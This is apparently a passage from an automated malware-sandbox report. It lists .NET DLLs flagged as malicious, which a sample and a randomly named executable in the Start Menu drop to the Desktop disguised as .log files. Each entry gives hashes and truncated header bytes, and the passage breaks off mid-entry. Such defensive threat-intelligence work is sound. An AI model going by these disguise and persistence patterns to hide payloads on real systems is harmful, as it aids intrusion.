                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ekfHlLLW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\eoWApcbj.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\fNFadZoi.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\fPQYZyug.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\fQyImqSF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\fUOHmcKi.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\fpYOnkHi.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\gXUhixOD.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\gajzKhLA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\grqSYDFD.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\gtCFacYK.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hAixtGfa.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hMsguyJb.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hfuaKQAB.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hssgXLlC.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hyNgaLOK.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ...............................c....@.................................ts..W.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H........O...#...........N......................................................................................................................................................................o+.tEy...7..o.v.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\hzuPnDnj.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\iIfHKufe.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\iKNqYmED.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\iWdYRpBW.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
